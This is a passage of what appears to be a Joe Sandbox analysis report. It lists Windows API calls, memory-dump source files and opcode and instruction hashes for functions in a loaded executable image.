                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9754b9473043cb69e2d1b6dd12cdbfb1d0cb6eccb38f6a2ece4aae55742935c8
                                                                                                                                                                                                                                                                            • Instruction ID: 6ab16926cba01b739522f792c38b1c3c6254e0d3d1dd6233a0815041279e30d0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9754b9473043cb69e2d1b6dd12cdbfb1d0cb6eccb38f6a2ece4aae55742935c8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5221D375900214AFCB14AFA8D981BEEB7F8EF46350F244065E814BB281D7709F81D7E5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C89A5D
                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C89A72
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C89ABA
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00C89AF0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3fe4e98cc064b3f7eb1fc767e7213df323b2fb24f6014d4354545640c5448d28
                                                                                                                                                                                                                                                                            • Instruction ID: 135d97151c49d2a11c57cfeda135daf31f359f80936143f35fc410342433aac4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fe4e98cc064b3f7eb1fc767e7213df323b2fb24f6014d4354545640c5448d28
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3021BF35600018AFCF299F54CC48FFE7BB9EB0A355F584165F9168B1B1D7709A50EB60
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,00C8DC30), ref: 00C5DBA6
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C5DBB5
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C5DBC4
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C8DC30), ref: 00C5DC21
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0ddb87758f1caee7f9917cec7cfd0be048a358864de3cf22e158d948d2dddf4d
                                                                                                                                                                                                                                                                            • Instruction ID: bb5723a757865dc45faa25c88b0ebd7eba2d27b8b47b494483e3bfc9876cadef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ddb87758f1caee7f9917cec7cfd0be048a358864de3cf22e158d948d2dddf4d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 472182741043059F8324EF24C84096AB7E8AE55365F100A59F8AAC72A1D730DE8ACB46
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00C832A6
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C832C0
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C832CE
                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C832DC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9b1720a95a70cdf64fdd8b68592d7a7e801442092d62c8b13b0f411fd9769b95
                                                                                                                                                                                                                                                                            • Instruction ID: e4a4149f38b7c7e0c61e3145855b5fc5194a75ed75bb6b2a3921d6bb3e2d1c5a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b1720a95a70cdf64fdd8b68592d7a7e801442092d62c8b13b0f411fd9769b95
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F210331204555AFD704AB24C845F6ABB95EF81728F248258F8268B2D3C771EE82C7D8
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C596E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C58271,?,000000FF,?,00C590BB,00000000,?,0000001C,?,?), ref: 00C596F3
                                                                                                                                                                                                                                                                              • Part of subcall function 00C596E4: lstrcpyW.KERNEL32(00000000,?,?,00C58271,?,000000FF,?,00C590BB,00000000,?,0000001C,?,?,00000000), ref: 00C59719
                                                                                                                                                                                                                                                                              • Part of subcall function 00C596E4: lstrcmpiW.KERNEL32(00000000,?,00C58271,?,000000FF,?,00C590BB,00000000,?,0000001C,?,?), ref: 00C5974A
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C590BB,00000000,?,0000001C,?,?,00000000), ref: 00C5828A
                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00C590BB,00000000,?,0000001C,?,?,00000000), ref: 00C582B0
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C590BB,00000000,?,0000001C,?,?,00000000), ref: 00C582EB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                            • Opcode ID: 91cbcb65c72e184baa5a8c41469c29013811295c209e82cd4d2219c6997daf65
                                                                                                                                                                                                                                                                            • Instruction ID: 4ab9529ecfb157e9cc87c728816e2ba12a5dd552a788e6eb2cf1404be152c125
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91cbcb65c72e184baa5a8c41469c29013811295c209e82cd4d2219c6997daf65
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8611B13E200341ABCB149F38D845EBE77A9FF45751B50402AFD42C72A0EF719999D7A8
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 00C8615A
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C8616C
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C86177
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C862B5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 455545452-0
                                                                                                                                                                                                                                                                            • Opcode ID: e7ec3d4a2c3bf7557236c6afc0a4825f2fedb6252d3a2f39cb5eee6ae36f1317
                                                                                                                                                                                                                                                                            • Instruction ID: 1c8c23eedfbfd6a2c101ac09d0b72595f4f6e189c9b89881362ad87b8304f261
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7ec3d4a2c3bf7557236c6afc0a4825f2fedb6252d3a2f39cb5eee6ae36f1317
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7119675600218A6DB20FFA58C85FEF777CEB11358F10412AFA11D6082E7B0CA44DB68
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 30d597217c0163e2b310171683f1d422ef12c7f485610e142e118878e289fbf0
                                                                                                                                                                                                                                                                            • Instruction ID: 804427a7505b9271929d6fd8595c7f62a3b14f0740de4693bdc33c517b14532c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30d597217c0163e2b310171683f1d422ef12c7f485610e142e118878e289fbf0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9501ADB22092267EF6212AB8BCC0F2B670DDF913B8B340325F532A15D1DE608D80E660
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C52394
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C523A6
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C523BC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C523D7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                            • Opcode ID: 63bb5fb06465207fed550b8ea968c0ce98499e11619ab9c0b23ed8de56180429
                                                                                                                                                                                                                                                                            • Instruction ID: bb57c0294e2e71cc0da0c2209bf771e6cbfbebfff3dbc9786e062a511b00d1ea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63bb5fb06465207fed550b8ea968c0ce98499e11619ab9c0b23ed8de56180429
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1111093A900218FFEF119BA5CD85F9EBBB8FB09751F200091EA11B7290D6716E54DB98
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00BF1AF4
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C331F9
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C33203
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C3320E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                            • Opcode ID: d2a7c815076e0748d1da541ae73c1b43383d48a88c7cfafb08f758bd8436983d
                                                                                                                                                                                                                                                                            • Instruction ID: b9d0199eb303faedc1d05b80b9586c792d68a40e9e07f9904003291db23641ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2a7c815076e0748d1da541ae73c1b43383d48a88c7cfafb08f758bd8436983d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B114C71A0101DEBCB00DFA8C985AFE77B8EB05354F100892FA22E3180D771BB95DBA5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C5EB14
                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00C5EB47
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C5EB5D
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C5EB64
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                            • Opcode ID: db1bec888e7fb4ca862866a21c0cd5e8ceae9ea25afb5a26eefe7efb0ff6ae22
                                                                                                                                                                                                                                                                            • Instruction ID: 51f7faf5d4400ce8ce5b4e16b36a0daf8c133634909a599ff2964be5c3820f58
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db1bec888e7fb4ca862866a21c0cd5e8ceae9ea25afb5a26eefe7efb0ff6ae22
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB112BBA900258BBC705ABA8DC09FDE7FADEB45322F144256F826D32E0D6748E448764
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,?,00C1D369,00000000,00000004,00000000), ref: 00C1D588
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C1D594
                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C1D59B
                                                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00C1D5B9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 173952441-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5ab516dab9a0f90b2a1499d02416148d47d3ca0bca0e94f2c362b3123a2f8d63
                                                                                                                                                                                                                                                                            • Instruction ID: e6eb75c186075ff0c42b632fe5803e1d3c348d31dd394c537abb513bb30f625b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ab516dab9a0f90b2a1499d02416148d47d3ca0bca0e94f2c362b3123a2f8d63
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7001C472404214BBCB116BA5EC05BEE7B6AEF83335F100259F927861E0DB709981F7A1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF78B1
                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00BF78C5
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF78CF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                            • Opcode ID: a944988429960973d9b2d6045f9b29708cfdd9a7dc16a2fb09b0f0e702803d76
                                                                                                                                                                                                                                                                            • Instruction ID: a0601cbe5f5b4f673b1f1e6383456291a5ae0aa795da882de1cf60479ab7835e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a944988429960973d9b2d6045f9b29708cfdd9a7dc16a2fb09b0f0e702803d76
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD117972505548BFEB025F919C58FEA7BA9FF083A4F040195FA0252160DB319C60EBA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00C2338D,00000364,00000000,00000000,00000000,?,00C235FE,00000006,FlsSetValue), ref: 00C23418
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00C2338D,00000364,00000000,00000000,00000000,?,00C235FE,00000006,FlsSetValue,00C93260,FlsSetValue,00000000,00000364,?,00C231B9), ref: 00C23424
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C2338D,00000364,00000000,00000000,00000000,?,00C235FE,00000006,FlsSetValue,00C93260,FlsSetValue,00000000), ref: 00C23432
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
